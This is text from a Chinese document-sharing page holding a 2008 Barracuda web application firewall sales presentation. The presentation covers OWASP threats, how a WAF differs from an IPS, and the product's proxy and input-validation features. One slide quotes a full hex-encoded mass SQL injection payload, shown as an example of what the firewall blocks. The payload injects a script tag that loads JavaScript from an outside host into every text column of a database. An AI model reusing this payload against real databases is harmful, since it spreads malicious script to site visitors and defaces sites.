收藏
下载资源

梭子鱼web应用防火墙

上传人:第*** 文档编号:54405898 上传时间:2018-09-12 格式:PPT 页数:37 大小:2.69MB
返回 下载 相关 举报
梭子鱼web应用防火墙_第1页
第1页 / 共37页
梭子鱼web应用防火墙_第2页
第2页 / 共37页
梭子鱼web应用防火墙_第3页
第3页 / 共37页
梭子鱼web应用防火墙_第4页
第4页 / 共37页
梭子鱼web应用防火墙_第5页
第5页 / 共37页
点击查看更多>>
资源描述

《梭子鱼web应用防火墙》由会员分享,可在线阅读,更多相关《梭子鱼web应用防火墙(37页珍藏版)》请在金锄头文库上搜索。

1、保护企业网站安全 WEB应用安全防护技术,Web网站应用的特点,客户,员工,合作伙伴间互动更多 工作系统的英特网化 关键业务流程和数据在英特网上的暴露 协议和架构的标准化也带来更多的安全问题,web应用安全问题不断增长,应用安全,数据安全不断增长,传统安全问题 如病毒、垃圾邮件 等不断递减,您是否有如下担心?,网站被攻击 网站被篡改 被OWASP 列举的前十位的攻击攻破 数据被窃取 怎么才能阻止下列攻击: 跨站脚本攻击(XSS) SQL 注入 Cookie 篡改 缓存溢出 网站需要达到PCI标准,现有安全措施无能为力,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,防火墙,数据

2、中心,局域网,防火墙只能阻断网络层的攻击,入侵监测系统,80端口web流量仍然能够通过,最终用户,Web 应用,对已知漏洞的防护延迟,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,Database Servers Customer Info Business Data Transaction Info,机密数据,一成不变的低效的“消防演习”模式 补丁总是不够及时而且容易出错 基于指纹的防护措施 对于“零日攻击”毫无办法,Web应用防护和IPS的区别,IPS设备是基于指纹识别的安全系统 通过将数据包和数据库中攻击指纹的比较来判断是否为恶意攻击 通常从被动的IDS技术进化而来。

3、基于特征的 针对典型攻击技术的报警和阻断 使用“允许除非明确否认”模式 目的是保护广泛的一段网络协议和环境,而不是侧重保护web应用,IPS对Web攻击防护的不足,IPS只能捕获已知攻击 黑客少许修改,现有的特征库将不起作用。 SSL加密使IPS设备对所有的web攻击失效。 IPS不能对URL和Unicode编码流量规范化。碎片攻击等将使IPS失去作用。 IPS只知道包和请求,而不知道网络和应用。无法根据实际应用做客户化防护。,Tom & Jerry,Web应用防护和IPS的区别,可怜的老板,聪明的小偷,伪装一下,轻松搞定,奇怪? 老鼠不应该带帽子的,不符合Jerry老鼠的特征,允许通行,Je

4、rry,A,B,C,两个耳朵 一条尾巴 身高15cm,特征库,嘿嘿,又来了,真实只笨猫,老鼠就是老鼠,穿什么衣服,禁止入内,最新老鼠识别器,我看行,老鼠,老虎,大象,猫,老鼠骨骼特征 老鼠DNA分析,资料库,Barracuda Networks Confidential,13,WEB应用安全防护技术,全面的WEB站点防护,降低商业风险 各种攻击 非法访问 WEB站点伪装 WEB站点篡改 Outbound 数据窃取防护 应用传输加速 缓存 、压缩、TCP连接复用、SSL卸载和加速、负载均衡 审计及合规 - 帮助企业通过安全审计 - 达到PCI (支付卡) 应用安全规范要求 - 美国萨班法案(Sa

5、rbanes Oxley)及其他合规性要求,厂商/咨询顾问的解决方案 作为RFI/RFP模版,需求 6.5: 开发安全的应用程序 需求 6.6: 审核应用安全安全性 选择 1: 专业公司进行代码审核 选择 2: 部署应用防火墙,哪里需要我们,Business Critical Applications,NetContinuum Web Security Gateway,Application D,Application E,Supply Chain App Servers,FTP Servers,Inventory Servers,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。

6、,用户,Web应用,TCP进程代理(TCP Session Full Proxy) Net防火墙 NAT, ACL, PAT 进程维护(Normalize Session) 协议遵从(Protocol Compliance) SSL加密解密 HTTP信头重写 URL翻译,网站隐藏, 防爬行, Web地址转换 AAA 应用防DoS SQL/命令注入 DAP (Global and Session) URL ACLs Forms及Cookie窃取 REGEX保护,TCP Pooling 缓存, GZIP压缩 SSL卸载, 重新加密 应用及服务器健康检查 内容交换(Content Switching

7、) 负载均衡 记录、监控、报告,终止,安全,加速,反向代理,保护应用基础架构 隐藏 Cookie 安全 Web 地址转换 根据应用强化安全 动态应用建模 弹性安全策略 颗粒度极小,可高度自定义的Web 访问控制列表,三步实现应用安全,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,1,终止所有流量,我们就可以管理它。,tcp,ssl,严格意义上来说,这是“反向代理”。,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,部署,2,在边界对用户进行验证,LDAP,RADIUS,Client Certificates,Source IP,HTTP Auth,CA Sit

8、eMinder,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,安全,3,标准化数据,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,安全,4,检查流量是否为恶意攻击,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,安全,企业网站结构,Operating Systems,Operating Systems,Operating Systems,Network Firewall,http :/www.none.to/script ?submenu=update-%00,Web Servers Presentation Layer,Database S

9、ervers Customer Info Business Data Transaction Info,App Servers Business Logic J2EE/.NET Legacy Apps,Apache,Linux Solaris AIX Windows,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,web应用防火墙如何工作?,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,用户,对应用数据录入完整检查 完全掌握应有数据值类型 实时策略生成及执行,请求限制,请求限制主要是对请求中的报头信息进行参数长度的限制,阻断超出限制范围的请求,保证免遭缓冲溢出

10、等恶意攻击。,SQL注入的一个实例,;DECLARE%20S%20CHAR(4000);SET%20S=CAST(0x4445434C4152452040542076617263686 17228323535292C404320766172636861722832353529204445434C415245205461626C655F4 37572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652 066726F6D207379736F626A6563747320612C737973636F6C756D

11、6E732062207768657265206 12E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653 D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E7 8747970653D31363729204F50454E205461626C655F437572736F72204645544348204E45585 42046524F4D20205461626C655F437572736F7220494E

12、544F2040542C4043205748494C45284 04046455443485F5354415455533D302920424547494E20657865632827757064617465205B2 72B40542B275D20736574205B272B40432B275D3D727472696D28636F6E76657274287661726 36861722C5B272B40432B275D29292B2727223E3C2F7469746C653E3C7363726970742073726 33D22687474703A2F2F6A732E75736572732E

13、35312E6C612F313938313136322E6A73223E3C2 F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272 725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7573657 2732E35312E6C612F313938313136322E6A73223E3C2F7363726970743E3C212D2D272727294 645544348204E4558542046524F4D

14、20205461626C655F437572736F7220494E544F2040542C4 04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546 1626C655F437572736F72%20AS%20CHAR (4000);EXEC(S),输入验证引擎侦测并阻断攻击 SQL 注入 跨站点脚本攻击 命令攻击 非法字符集 排除关键字 偷窃命令 参数访问控制列表 强化对表单字段和其他应用参数的安全策略 报头访问控制列表 强化对标准和自定义HTTP报头的安全策略 阻断隐藏在报头值中的攻击,200

15、8 博威特网络技术(上海)有限公司。版权所有,不得转载。,输入验证,Cookie 加密保证会话的完整性 维护客户端会话完整性 保证用户信息的安全 Cookie 加密提供私密性 数字证书提供可靠性 对用户和应用完全透明,2008 博威特网络技术(上海)有限公司。版权所有,不得转载。,会话完整,站点信息隐藏,PROBLEM Easy to discover a gold mine of clues about app environment,黑客,Whisker scanning http:/ Servers: Microsoft IIS 4.0 Windows 2000 SP2 FrontPage/5.0.2.2623 Vulnerable URL : cgi-bin/code.php3 Vulnerable URL : cgi-bin/admin.php3,

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 建筑/环境 > 工程造价

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号